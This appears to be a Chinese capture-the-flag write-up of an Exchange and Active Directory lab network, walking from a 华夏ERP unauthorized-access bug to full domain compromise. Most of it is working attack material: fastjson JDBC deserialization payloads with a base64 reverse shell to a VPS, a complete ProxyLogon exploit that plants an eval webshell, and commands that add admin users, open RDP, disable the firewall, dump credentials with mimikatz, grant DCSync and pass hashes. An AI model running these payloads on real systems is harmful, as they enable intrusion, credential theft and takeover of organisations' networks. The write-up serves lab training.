Exchange + JDBC + FastJSON 三者之间的关系简单理解
Exchange 获取邮件 ->JDBC 存入 MySQL ->FastJSON 转换 JSON ,Java 应用可以处理企业邮件,并提供 API 给前端。

flag01

拿到ip后先用fscan扫一下

发现8000端口存在一个web服务,访问是一个华夏erp

搜了该CMS相关的漏洞,发现一个未授权漏洞,路径如下:

1
/user/getAllList;.ico

访问发现管理员账号密码

1
{"code":200,"data":{"userList":[{"id":63,"username":"季圣华","loginName":"jsh","password":"e10adc3949ba59abbe56e057f20f883e","position":"","department":null,"email":"","phonenum":"","ismanager":1,"isystem":1,"status":0,"description":"","remark":null,"tenantId":63},{"id":120,"username":"管理员","loginName":"admin","password":"e10adc3949ba59abbe56e057f20f883e","position":null,"department":null,"email":null,"phonenum":null,"ismanager":1,"isystem":0,"status":0,"description":null,"remark":null,"tenantId":null},{"id":131,"username":"测试用户","loginName":"test123","password":"e10adc3949ba59abbe56e057f20f883e","position":"","department":null,"email":"","phonenum":"","ismanager":1,"isystem":0,"status":0,"description":"","remark":null,"tenantId":63}]}}

解密得到明文密码admin/123456

解码登陆后台后,没有发现可利用的点;

fastjson反序列化漏洞检测

先随便抓个包看看,发现后端查询功能的内容是通过JSON传递的,在查询的参数上测试是否存在fastjson反序列化
poyload:

1
{"@type":"java.nt.Inet4Address","val":"bc50l0.dnslog.cn"}#val的值为dnslog地址

执行poyload,poyload需要url全编码

执行后,dnslog有回显,说明poyload执行成功存在fastjson反序列化

使用如下poyload测试fastjson的版本,当fastjson<=1.2.68时,下方的代码就能成功执行,反之相反。

1
2
3
4
5
6
7
8
9
10
11
12
13
14

[
    {
        "@type": "java.lang.AutoCloseable",
        "@type": "java.io.ByteArrayOutputStream"
    }, {
        "@type": "java.io.ByteArrayOutputStream"
    }, {
        "@type": "java.net.InetSocketAddress" {
            "address": ,
            "val": "lt1g65.dnslog.cn"
        }
    }
]

将poyload url编码后发送

发现有回显,代码执行成功说明fastjson<=1.2.68

fastjson<=1.2.68+ JDBC 反序列化实现RCE

同时根据题目提示的JDBC,针对fastjson<=1.2.68打JDBC实现二次反序列化CC,从而达到RCE
https://github.com/safe6Sec/Fastjson fastjson的poyload的来源

首先现在服务器上开启一个恶意的MySQL服务,需要下载两个工具MySQL_Fake_Serverysoserial,同时需要把ysoserial-all.jar放到MySQL_Fake_Server的目录里面。
MySQL_Fake_Server的config配置如下:
ysoserialPath填写刚刚下载的Ysoserial地址
CC利用链选CC6,是CC3版本中最通用的一条链,bash后面为弹shell的poyload,需要添加vpsip和要监听的端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
{

    "config":{

        "ysoserialPath":"ysoserial-all.jar",

        "javaBinPath":"java",

        "fileOutputDir":"./fileOutput/",

        "displayFileContentOnScreen":true,

        "saveToFile":true

    },

    "fileread":{

        "win_ini":"c:\\windows\\win.ini",

        "win_hosts":"c:\\windows\\system32\\drivers\\etc\\hosts",

        "win":"c:\\windows\\",

        "linux_passwd":"/etc/passwd",

        "linux_hosts":"/etc/hosts",

        "index_php":"index.php",

        "ssrf":"https://www.baidu.com/",

        "__defaultFiles":["/etc/hosts","c:\\windows\\system32\\drivers\\etc\\hosts"]

    },

    "yso":{

        "Jdk7u21":["Jdk7u21","calc"],

        "CommonsCollections6":["CommonCollections6","bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC92cHNpcC85OTk5IDA+JjE=}|{base64,-d}|{bash,-i}"]

    }

}

开启服务

1
python3 server.py

同时需要监听9999端口(端口为config中设置的)

需要执行的poyload如下:
需要设置vpsip和端口
该poyload是MySQL JDBC 连接伪造,利用 autoDeserialize=true 触发 Java 反序列化漏洞。
从而导致执行恶意命令(反连vps的9999端口)
https://github.com/safe6Sec/Fastjson 

1
2
{ "name": { "@type": "java.lang.AutoCloseable", "@type": "com.mysql.jdbc.JDBC4Connection", "hostToConnectTo": "vps_ip", "portToConnectTo": 3306, "info": { "user": "yso_CommonsCollections6_bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC92cHNpcC85OTk5IDA+JjE=}|{base64,-d}|{bash,-i}", "password": "pass", "statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor", "autoDeserialize": "true", "NUM_HOSTS": "1" } }

poyload解释

注:对于config和poyload的AI解释为

  1. 执行的poyload的JSON 可能是一个实际攻击 payload,用于 MySQL JDBC 反序列化漏洞,利用 autoDeserialize=true 配合 statementInterceptors 进行 Java 反序列化攻击;user 字段的值包含 ysoserial CommonsCollections6 反序列化利用链,通过 bash -c 执行 base64 编码的命令,最终尝试反向 shell 连接到 vps_ip:9999
  2. conifg的JSON 可能是用于 ysoserial 生成 payload(1的poyload由2生成),然后攻击者将其注入到 JSON。(填充到p要执行的 JSON中,伪装成 MySQL 连接参数,从而在目标服务器上执行代码。)

两者都涉及 ysoserial 反序列化漏洞,目标是执行系统命令,甚至读取敏感文件。如果 MySQL 服务器启用了 autoDeserialize=true,攻击者可以通过 MySQL 连接参数直接触发反序列化漏洞,执行远程命令。

利用流程

服务端监听端口

服务端开启mysql

执行poyload

服务器mysql响应

得到shell,并且为高权限,直接查看flag

flag02

上传fscan和chisel
服务器端python开启http服务

shell下载fscan和chisel

内网扫描


得到内网信息

1
2
3
4
5
172.22.3.2 DC
172.22.3.9   XIAORANG-EXC01
172.22.3.12 拿下
172.22.3.26  XIAORANG-PC

内网穿透

Exchange ProxyLogon

访问3.9机器的exchange服务

查看源码发现版本为15.1.1591为Exchange Server 2016

Exchange漏洞利用

介绍
ProxyLogonMicrosoft Exchange Server 在 2021 年曝光的远程代码执行(RCE)漏洞,编号为 CVE-2021-26855(SSRF)。它允许攻击者绕过身份验证,直接访问 Exchange 服务器,并结合其他漏洞(如 CVE-2021-27065远程执行代码(RCE),最终控制整个服务器。

Exchange Server 2016可以使用proxylogon打
可以直接利用 CVE-2021-27065  RCE,前提是要知道用户名,一般来说都是 administrator@doamin,如果不知道可以通过 CVE-2021-26855 (SSRF) 获取到,我这里是直接使用的工具,下方的脚本没有使用
CVE-2021-26855 SSRF

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
#!/usr/bin/env python3
# coding: utf-8
from urllib.parse import urljoin

from pocsuite3.api import POCBase, Output, register_poc, logger, requests


class DemoPOC(POCBase):
    vulID = ''
    version = '1.0'
    author = ['']
    vulDate = '2021-03-06'
    createDate = '2021-03-06'
    updateDate = '2021-03-06'
    references = ['']
    name = 'Microsoft Exchange Server SSRF漏洞'
    appPowerLink = ''
    appName = 'Microsoft Exchange Server'
    appVersion = 'Exchange Server 2013、Exchange Server 2016、Exchange Server 2019'
    vulType = ''
    desc = '''
    Microsoft Exchange Server SSRF漏洞
    '''
    samples = ['']
    install_requires = ['']

    def _verify(self):
        result = {}

        try:
            vul_url = urljoin(self.url, "/owa/auth/x.js")
            headers = {
                'Cookie': 'X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;'
            }
            resp = requests.get(vul_url, headers=headers, timeout=10)
            if resp.status_code == 500 and 'NegotiateSecurityContext' in resp.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
        except Exception as e:
            logger.error(e)

        return self.parse_output(result)

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register_poc(DemoPOC)

配合CVE-2021-27065实现 RCE

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
 # -*- coding: utf-8 -*-
import requests
from urllib3.exceptions import InsecureRequestWarning
import random
import string
import argparse
import sys
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)


fuzz_email = ['administrator', 'webmaste', 'support', 'sales', 'contact', 'admin', 'test',
              'test2', 'test01', 'test1', 'guest', 'sysadmin', 'info', 'noreply', 'log', 'no-reply']

proxies = {}
user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"

shell_path = "Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\test11.aspx"
shell_absolute_path = "\\\\127.0.0.1\\c$\\%s" % shell_path
# webshell-马子内容
shell_content = '<script language="JScript" runat="server"> function Page_Load(){/**/eval(Request["code"],"unsafe");}</script>'

final_shell = ""

def id_generator(size=6, chars=string.ascii_lowercase + string.digits):
    return ''.join(random.choice(chars) for _ in range(size))




if __name__=="__main__":
    parser = argparse.ArgumentParser(
        description='Example: python exp.py -u 127.0.0.1 -user administrator -suffix @ex.com\n如果不清楚用户名,可不填写-user参数,将自动Fuzz用户名。')
    parser.add_argument('-u', type=str,
                        help='target')
    parser.add_argument('-user',
                        help='exist email', default='')
    parser.add_argument('-suffix',
                        help='email suffix')
    args = parser.parse_args()
    target = args.u
    suffix = args.suffix
    if suffix == "":
        print("请输入suffix")

    exist_email = args.user
    if exist_email:
        fuzz_email.insert(0, exist_email)
    random_name = id_generator(4) + ".js"
    print("目标 Exchange Server: " + target)

    for i in fuzz_email:
        new_email = i+suffix
        autoDiscoverBody = """<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">
    <Request>
      <EMailAddress>%s</EMailAddress> <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>
    </Request>
</Autodiscover>
""" % new_email
        # print("get FQDN")
        FQDN = "EXCHANGE01"
        ct = requests.get("https://%s/ecp/%s" % (target, random_name), headers={"Cookie": "X-BEResource=localhost~1942062522",
                                                                            "User-Agent": user_agent},
                      verify=False, proxies=proxies)

        if "X-CalculatedBETarget" in ct.headers and "X-FEServer" in ct.headers:
            FQDN = ct.headers["X-FEServer"]
            print("got FQDN:" + FQDN)

        ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
            "Cookie": "X-BEResource=%s/autodiscover/autodiscover.xml?a=~1942062522;" % FQDN,
            "Content-Type": "text/xml",
            "User-Agent": user_agent},
            data=autoDiscoverBody,
            proxies=proxies,
            verify=False
        )

        if ct.status_code != 200:
            print(ct.status_code)
            print("Autodiscover Error!")

        if "<LegacyDN>" not in str(ct.content):
            print("Can not get LegacyDN!")
        try:
            legacyDn = str(ct.content).split("<LegacyDN>")[
                1].split(r"</LegacyDN>")[0]
            print("Got DN: " + legacyDn)

            mapi_body = legacyDn + \
                "\x00\x00\x00\x00\x00\xe4\x04\x00\x00\x09\x04\x00\x00\x09\x04\x00\x00\x00\x00\x00\x00"

            ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
                "Cookie": "X-BEResource=Administrator@%s:444/mapi/emsmdb?MailboxId=f26bc937-b7b3-4402-b890-96c46713e5d5@exchange.lab&a=~1942062522;" % FQDN,
                "Content-Type": "application/mapi-http",
                "X-Requesttype": "Connect",
                "X-Clientinfo": "{2F94A2BF-A2E6-4CCCC-BF98-B5F22C542226}",
                "X-Clientapplication": "Outlook/15.0.4815.1002",
                "X-Requestid": "{E2EA6C1C-E61B-49E9-9CFB-38184F907552}:123456",
                "User-Agent": user_agent
            },
                data=mapi_body,
                verify=False,
                proxies=proxies
            )
            if ct.status_code != 200 or "act as owner of a UserMailbox" not in str(ct.content):
                print("Mapi Error!")
                exit()

            sid = str(ct.content).split("with SID ")[
                1].split(" and MasterAccountSid")[0]

            print("Got SID: " + sid)
            sid = sid.replace(sid.split("-")[-1], "500")

            proxyLogon_request = """<r at="Negotiate" ln="john"><s>%s</s><s a="7" t="1">S-1-1-0</s><s a="7" t="1">S-1-5-2</s><s a="7" t="1">S-1-5-11</s><s a="7" t="1">S-1-5-15</s><s a="3221225479" t="1">S-1-5-5-0-6948923</s></r>
            """ % sid

            ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
                "Cookie": "X-BEResource=Administrator@%s:444/ecp/proxyLogon.ecp?a=~1942062522;" % FQDN,
                "Content-Type": "text/xml",
                "msExchLogonMailbox": "S-1-5-20",
                "User-Agent": user_agent
            },
                data=proxyLogon_request,
                proxies=proxies,
                verify=False
            )
            if ct.status_code != 241 or not "set-cookie" in ct.headers:
                print("Proxylogon Error!")
                exit()

            sess_id = ct.headers['set-cookie'].split(
                "ASP.NET_SessionId=")[1].split(";")[0]

            msExchEcpCanary = ct.headers['set-cookie'].split("msExchEcpCanary=")[
                1].split(";")[0]
            print("Got session id: " + sess_id)
            print("Got canary: " + msExchEcpCanary)

            ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
                # "Cookie": "X-BEResource=Administrator@%s:444/ecp/DDI/DDIService.svc/GetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % (
                # FQDN, msExchEcpCanary, sess_id, msExchEcpCanary),

                "Cookie": "X-BEResource=Admin@{server_name}:444/ecp/DDI/DDIService.svc/GetList?reqId=1615583487987&schema=VirtualDirectory&msExchEcpCanary={msExchEcpCanary}&a=~1942062522; ASP.NET_SessionId={sess_id}; msExchEcpCanary={msExchEcpCanary1}".
                            format(server_name=FQDN, msExchEcpCanary1=msExchEcpCanary, sess_id=sess_id,
                                    msExchEcpCanary=msExchEcpCanary),
                            "Content-Type": "application/json; charset=utf-8",
                            "msExchLogonMailbox": "S-1-5-20",
                            "User-Agent": user_agent

                            },
                            json={"filter": {
                                "Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",
                                                "SelectedView": "", "SelectedVDirType": "OAB"}}, "sort": {}},
                            verify=False,
                            proxies=proxies
                            )

            if ct.status_code != 200:
                print("GetOAB Error!")
                exit()
            oabId = str(ct.content).split('"RawIdentity":"')[1].split('"')[0]
            print("Got OAB id: " + oabId)

            oab_json = {"identity": {"__type": "Identity:ECP", "DisplayName": "OAB (Default Web Site)", "RawIdentity": oabId},
                        "properties": {
                            "Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",
                                        "ExternalUrl": "http://ffff/#%s" % shell_content}}}

            ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
                "Cookie": "X-BEResource=Administrator@%s:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % (
                    FQDN, msExchEcpCanary, sess_id, msExchEcpCanary),
                "msExchLogonMailbox": "S-1-5-20",
                "Content-Type": "application/json; charset=utf-8",
                "User-Agent": user_agent
            },
                json=oab_json,
                proxies=proxies,
                verify=False
            )
            if ct.status_code != 200:
                print("Set external url Error!")
                exit()

            reset_oab_body = {"identity": {"__type": "Identity:ECP", "DisplayName": "OAB (Default Web Site)", "RawIdentity": oabId},
                            "properties": {
                                "Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",
                                                "FilePathName": shell_absolute_path}}}

            ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
                "Cookie": "X-BEResource=Administrator@%s:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % (
                    FQDN, msExchEcpCanary, sess_id, msExchEcpCanary),
                "msExchLogonMailbox": "S-1-5-20",
                "Content-Type": "application/json; charset=utf-8",
                "User-Agent": user_agent
            },
                json=reset_oab_body,
                proxies=proxies,
                verify=False
            )

            if ct.status_code != 200:
                print("写入shell失败")
                exit()
            shell_url = "https://"+target+"/owa/auth/test11.aspx"
            print("成功写入shell:" + shell_url)
            print("下面验证shell是否ok")
            print('code=Response.Write(new ActiveXObject("WScript.Shell").exec("whoami").StdOut.ReadAll());')
            print("正在请求shell")
            import time
            time.sleep(1)
            data = requests.post(shell_url, data={
                                "code": "Response.Write(new ActiveXObject(\"WScript.Shell\").exec(\"whoami\").StdOut.ReadAll());"}, verify=False, proxies=proxies)
            if data.status_code != 200:
                print("写入shell失败")
            else:
                print("shell:"+data.text.split("OAB (Default Web Site)")
                    [0].replace("Name                            : ", ""))
                print('[+]用户名: '+ new_email)
                final_shell = shell_url
                break
        except:
            print('[-]用户名: '+new_email)
            print("=============================")
    if not final_shell:
        sys.exit()
    print("下面启用交互式shell")
    while True:
        input_cmd = input("[#] command: ")
        data={"code": """Response.Write(new ActiveXObject("WScript.Shell").exec("cmd /c %s").stdout.readall())""" % input_cmd}
        ct = requests.post(
            final_shell,
            data=data,verify=False, proxies=proxies)
        if ct.status_code != 200 or "OAB (Default Web Site)" not in ct.text:
            print("[*] Failed to execute shell command")
        else:
            shell_response = ct.text.split(
                "Name                            :")[0]
            print(shell_response)

漏洞利用流程

使用工具proxylogon,也可以使用exprolog

1
proxychains python2 proxylogon.py 172.22.3.9 administrator@xiaorang.lab

拿到shell,且为system权限

添加用户方便操作

1
2
net user nihao9 nihao9! /add  
net localgroup administrators nihao9 /add

添加用户

远程桌面连接登录用户

查看administrator目录下的flag

远程端口 3389 没开的情况下使用的命令

1
2
3
4
5
6
7
8
9
10
11
#机器通过注册表修改允许远程访问的命令
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

#机器修改注册表开启3389端口
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3389 /f
net stop TermService
net start TermService

#关掉防火墙
netsh advfirewall set allprofiles state off

flag04

再查看用户时候看到还有一个Zhangtong的用户

使用mimikatz抓取密码

1
mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit

拿到的用户hash

1
2
3
4
XIAORANG-EXC01$
04a7efba490c30f2db51cd893d09a11d
Zhangtong
22c7f81993e96ac83ac2f3f1903de8b4

上传个bloodhound分析域环境(需要上传到域机器上,或者上传到通过流量转发的机器上),发现XIAORANG-EXC01$机器他对域内用户具有 WriteDacl

WriteDacl :可写入目标 DACL,修改 DACL 访问权,即是说可以利用 WriteDacl 权限添加 Zhangtong 的 DCSync 权限

1
proxychains python3 dacledit.py xiaorang.lab/XIAORANG-EXC01\$ -hashes :04a7efba490c30f2db51cd893d09a11d -action write -rights DCSync -principal Zhangtong -target-dn "DC=xiaorang,DC=lab" -dc-ip 172.22.3.2

如果命令执行不成功,如上图,下载msada_guids.py到/usr/lib/python3/dist-packages/impacket即可,

添加权限后,使用Zhangtong用户dump hash

1
proxychains python3 secretsdump.py xiaorang.lab/Zhangtong@172.22.3.2 -hashes :22c7f81993e96ac83ac2f3f1903de8b4 -just-dc-ntlm

得到域管理员的hash

1
xiaorang.lab\Administrator:500:aad3b435b51404eeaad3b435b51404ee:7acbc09a6c0efd81bfa7d5a1d4238beb::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b8fa79a52e918cb0cbcd1c0ede492647::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: xiaorang.lab\$431000-7AGO1IPPEUGJ:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: xiaorang.lab\SM_46bc0bcd781047eba:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: xiaorang.lab\SM_2554056e362e45ba9:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: xiaorang.lab\SM_ae8e35b0ca3e41718:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: xiaorang.lab\SM_341e33a8ba4d46c19:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: xiaorang.lab\SM_3d52038e2394452f8:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: xiaorang.lab\SM_2ddd7a0d26c84e7cb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: xiaorang.lab\SM_015b052ab8324b3fa:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: xiaorang.lab\SM_9bd6f16aa25343e68:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: xiaorang.lab\SM_68af2c4169b54d459:1133:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: xiaorang.lab\HealthMailbox8446c5b:1135:aad3b435b51404eeaad3b435b51404ee:6a049c17ae6f214d0ce0bb958be94c7a::: xiaorang.lab\HealthMailbox0d5918e:1136:aad3b435b51404eeaad3b435b51404ee:33cd42e4c654333ef6118bea55f376ba::: xiaorang.lab\HealthMailboxeda7a84:1137:aad3b435b51404eeaad3b435b51404ee:1e89e23e265bb7b54dc87938b1b1a131::: xiaorang.lab\HealthMailbox33b01cf:1138:aad3b435b51404eeaad3b435b51404ee:0eff3de35019c2ee10b68f48941ac50d::: xiaorang.lab\HealthMailbox9570292:1139:aad3b435b51404eeaad3b435b51404ee:e434c7db0f0a09de83f3d7df25ec2d2f::: xiaorang.lab\HealthMailbox3479a75:1140:aad3b435b51404eeaad3b435b51404ee:c43965ecaa92be22c918e2604e7fbea0::: xiaorang.lab\HealthMailbox2d45c5b:1141:aad3b435b51404eeaad3b435b51404ee:4822b67394d6d93980f8e681c452be21::: xiaorang.lab\HealthMailboxec2d542:1142:aad3b435b51404eeaad3b435b51404ee:147734fa059848c67553dc663782e899::: xiaorang.lab\HealthMailboxf5f7dbd:1143:aad3b435b51404eeaad3b435b51404ee:e7e4f69b43b92fb37d8e9b20848e6b66::: xiaorang.lab\HealthMailbox67dc103:1144:aad3b435b51404eeaad3b435b51404ee:4fe68d094e3e797cfc4097e5cca772eb::: xiaorang.lab\HealthMailbox320fc73:1145:aad3b435b51404eeaad3b435b51404ee:0c3d5e9fa0b8e7a830fcf5acaebe2102::: xiaorang.lab\Lumia:1146:aad3b435b51404eeaad3b435b51404ee:862976f8b23c13529c2fb1428e710296::: Zhangtong:1147:aad3b435b51404eeaad3b435b51404ee:22c7f81993e96ac83ac2f3f1903de8b4::: XIAORANG-WIN16$:1000:aad3b435b51404eeaad3b435b51404ee:b9df9852037915b5f26114769ace114a::: XIAORANG-EXC01$:1103:aad3b435b51404eeaad3b435b51404ee:b0d89dce8c89f4a43758961e8f782174::: XIAORANG-PC$:1104:aad3b435b51404eeaad3b435b51404ee:74d63202f94c220e09056568feafa894::: [*] Cleaning up...

横向移动

使用管理员hash,拿到管理员的shell,

1
proxychains4 python3 wmiexec.py xiaorang.lab/Administrator@172.22.3.2 -hashes :7acbc09a6c0efd81bfa7d5a1d4238beb -dc-ip 172.22.3.2 -codec gbk


查看域管下的flag

flag03

利用管理员hash使用smbexec横向到26这台机器后,发现没有flag
抓取的hash还看到了lumia的用户名,可以用域管理员创建一个本地管理员修改lumia的密码 ,然后登录桌面和邮箱查找信息,
我这里直接使用工具pthexchange把用户lumia的附件和邮件都下载了下来

1
proxychains python3 pthexchange.py --target https://172.22.3.9/ --username Lumia --password '00000000000000000000000000000000:862976f8b23c13529c2fb1428e710296' --action Download

发现有个加密的压缩包

打开其他文件,发现压缩包密码是手机号

恰好有个手机号的文件
使用john爆破压缩包得到压缩包密码18763918468

1
2
3
zip2john secret.zip >zip.txt

john --wordlist=1.txt zip.txt解读代码

解压文件得到flag

参考链接

https://mp.weixin.qq.com/s/Fvo1B5UbiqbENEe9uYrzJA
https://www.kinsomnia.cn/index.php/2024/03/25/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83-exchange/